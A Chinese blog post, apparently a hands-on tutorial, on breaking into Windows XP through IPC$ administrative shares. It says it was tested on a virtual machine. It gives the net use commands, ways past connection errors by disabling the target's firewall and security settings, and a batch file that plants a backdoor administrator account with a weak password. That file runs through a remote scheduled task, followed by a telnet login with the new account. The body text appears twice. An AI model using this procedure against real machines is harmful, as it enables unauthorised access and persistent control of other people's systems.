利用IPC$共享入侵windowsXP实战
2015-11-14 13:33
393 查看
测试环境:主机(windows XP sp3)与windows XP 虚拟机)
通过IPC$与windowsXP建立连接,在现在的绝大多数的XP操作系统中总是会出现问题。以下如何解决在建立IPC$出现的一系列问题。IPC$(Internet process connection),通常很多的机子的默认共享都是打开的!在cmd下使用net share命令是不是发现有很多$,“ipc$ admin$ ,c$ ,d$.....”(很危险啊)。
现在进入正题:
1.net use \\目标IP\ipc$
![](http://www.java3z.com/cwbwebhome/article/article9/img9/200906061244220675515.jpg)
出现53错误:找不到网络路径,(目标主机打开了系统防火墙或者其他防火墙软件,解决:关闭目标防火墙)
出现1326错误:
1)net use \\目标IP\ipc$ "" /user:"administrator"进行连接,报告系统发生1326错误,登陆失败:未知用户名或密码错误。检查一下我们的命令是否错误或者用户名错误。结果发现无错。
2)在远程机的"控制面板-文件夹选项-查看-简单的文件共享",去掉选取,然后再尝试连接。简单文件共享会
把网络连接权限都归为 guest连接,是无法访问IPC$等管理共享的.结果发现这个错误,纠正。
紧接着可能出现1327错误:登陆失败:用户帐户限制。可能的原因包括不允许空密码,登陆时间限制,或强制的策略限。"在远程机的"控制面板-管理工具-本地安全策略-安全选项-用户权限"指派里,禁用"空密码用户只能进行控制台登陆".
![](http://www.java3z.com/cwbwebhome/article/article9/img9/200906061244220734031.jpg)
映射对方默认共享c盘:net use z: \\目标IP\c$
![](http://www.java3z.com/cwbwebhome/article/article9/img9/200906061244220784312.jpg)
在我的电脑中会出现网络驱动器
![](http://www.java3z.com/cwbwebhome/article/article9/img9/200906061244220793218.jpg)
建立ipc$告一段落,删除ipc$连接:net sue \\目标IP\ipc$ /del
在此基础上在目标电脑上留下后门账号:
编写一个批处理文件,并拷贝到对方的电脑上,然后增加计划任务执行批处理文件;
批处理命令:(保存为adduser.bat)
net user nebulastest 123456 /add //增加用户nebulastest,密码123456
net localgroup administrators nebulastest /add //为用户nebulastest赋予管理员权限
然后在本机上执行命令(已经建立IPC$连接):copy adduser.bat \\目标IP\c$
接着查看目标电脑时间:net time \\目标IP
随后为目标电脑增加计划任务:at \\目标IP 执行时间 c:\adduser.bat
![](http://www.java3z.com/cwbwebhome/article/article9/img9/200906061244220806078.jpg)
删除当前IPC$链接,使用新用户和新密码建立IPC$链接,以测试时候建立账号成功。
net use \\目标IP\ipc$ "123456" /user:"nebulastest"
![](http://www.java3z.com/cwbwebhome/article/article9/img9/200906061244220815484.jpg)
使用telnet进行登陆:(前提:目标电脑已经开启telnet服务)
双击“telnet服务”-----选择“自动”-----点击“启动”
![](http://www.java3z.com/cwbwebhome/article/article9/img9/200906061244220857437.jpg)
在命令行输入:telnet 目标IP
之后弹出远程登录对话框,选择Y,输入用户名(后门账户,密码)
输入密码不会现在但是回车后会自动验证是否密码正确
![](http://www.java3z.com/cwbwebhome/article/article9/img9/200906061244220884859.jpg)
下图已经输入密码但是不会显示:
![](http://www.java3z.com/cwbwebhome/article/article9/img9/200906061244220914140.jpg)
登陆后的界面:
通过IPC$与windowsXP建立连接,在现在的绝大多数的XP操作系统中总是会出现问题。以下如何解决在建立IPC$出现的一系列问题。IPC$(Internet process connection),通常很多的机子的默认共享都是打开的!在cmd下使用net share命令是不是发现有很多$,“ipc$ admin$ ,c$ ,d$.....”(很危险啊)。
现在进入正题:
1.net use \\目标IP\ipc$
![](http://www.java3z.com/cwbwebhome/article/article9/img9/200906061244220675515.jpg)
出现53错误:找不到网络路径,(目标主机打开了系统防火墙或者其他防火墙软件,解决:关闭目标防火墙)
出现1326错误:
1)net use \\目标IP\ipc$ "" /user:"administrator"进行连接,报告系统发生1326错误,登陆失败:未知用户名或密码错误。检查一下我们的命令是否错误或者用户名错误。结果发现无错。
2)在远程机的"控制面板-文件夹选项-查看-简单的文件共享",去掉选取,然后再尝试连接。简单文件共享会
把网络连接权限都归为 guest连接,是无法访问IPC$等管理共享的.结果发现这个错误,纠正。
紧接着可能出现1327错误:登陆失败:用户帐户限制。可能的原因包括不允许空密码,登陆时间限制,或强制的策略限。"在远程机的"控制面板-管理工具-本地安全策略-安全选项-用户权限"指派里,禁用"空密码用户只能进行控制台登陆".
![](http://www.java3z.com/cwbwebhome/article/article9/img9/200906061244220734031.jpg)
映射对方默认共享c盘:net use z: \\目标IP\c$
![](http://www.java3z.com/cwbwebhome/article/article9/img9/200906061244220784312.jpg)
在我的电脑中会出现网络驱动器
![](http://www.java3z.com/cwbwebhome/article/article9/img9/200906061244220793218.jpg)
建立ipc$告一段落,删除ipc$连接:net sue \\目标IP\ipc$ /del
在此基础上在目标电脑上留下后门账号:
编写一个批处理文件,并拷贝到对方的电脑上,然后增加计划任务执行批处理文件;
批处理命令:(保存为adduser.bat)
net user nebulastest 123456 /add //增加用户nebulastest,密码123456
net localgroup administrators nebulastest /add //为用户nebulastest赋予管理员权限
然后在本机上执行命令(已经建立IPC$连接):copy adduser.bat \\目标IP\c$
接着查看目标电脑时间:net time \\目标IP
随后为目标电脑增加计划任务:at \\目标IP 执行时间 c:\adduser.bat
![](http://www.java3z.com/cwbwebhome/article/article9/img9/200906061244220806078.jpg)
删除当前IPC$链接,使用新用户和新密码建立IPC$链接,以测试时候建立账号成功。
net use \\目标IP\ipc$ "123456" /user:"nebulastest"
![](http://www.java3z.com/cwbwebhome/article/article9/img9/200906061244220815484.jpg)
使用telnet进行登陆:(前提:目标电脑已经开启telnet服务)
双击“telnet服务”-----选择“自动”-----点击“启动”
![](http://www.java3z.com/cwbwebhome/article/article9/img9/200906061244220857437.jpg)
在命令行输入:telnet 目标IP
之后弹出远程登录对话框,选择Y,输入用户名(后门账户,密码)
输入密码不会现在但是回车后会自动验证是否密码正确
![](http://www.java3z.com/cwbwebhome/article/article9/img9/200906061244220884859.jpg)
下图已经输入密码但是不会显示:
![](http://www.java3z.com/cwbwebhome/article/article9/img9/200906061244220914140.jpg)
登陆后的界面:
![](http://www.java3z.com/cwbwebhome/article/article9/img9/200906061244220927546.jpg)
相关文章推荐
- Android学习笔记(二九):嵌入浏览器
- 如何重装TCP/IP协议
- Windows 8 官方高清壁纸欣赏与下载
- 谁是桌面王者?Win PK Linux三大镇山之宝
- 对《大家都在点赞 Windows Terminal,我决定给你泼一盆冷水》一文的商榷
- Windows Clang开发环境备忘
- 从Windows系统下访问Linux分区相关软件
- 对《大家都在点赞 Windows Terminal,我决定给你泼一盆冷水》一文的商榷
- Windows下搭建本地SVN服务器
- Visual Studio 2012 示例代码浏览器 - 数以千计的开发示例近在手边,唾手可得
- Visual Studio 2012 示例代码浏览器 - 数以千计的开发示例近在手边,唾手可得
- 微软镜像下载
- windows server域用户提升到本地更高权限组中的方法
- 使用命令修改注册表键值及权限
- 通过手机、电脑远程开关机,Windows和linux机手机,电脑相互控制
- Windows XP最新应用技巧大荟萃
- Windows 系统组策略应用全攻略(上)第1/2页
- VBS脚本写的Windows硬件检测工具分享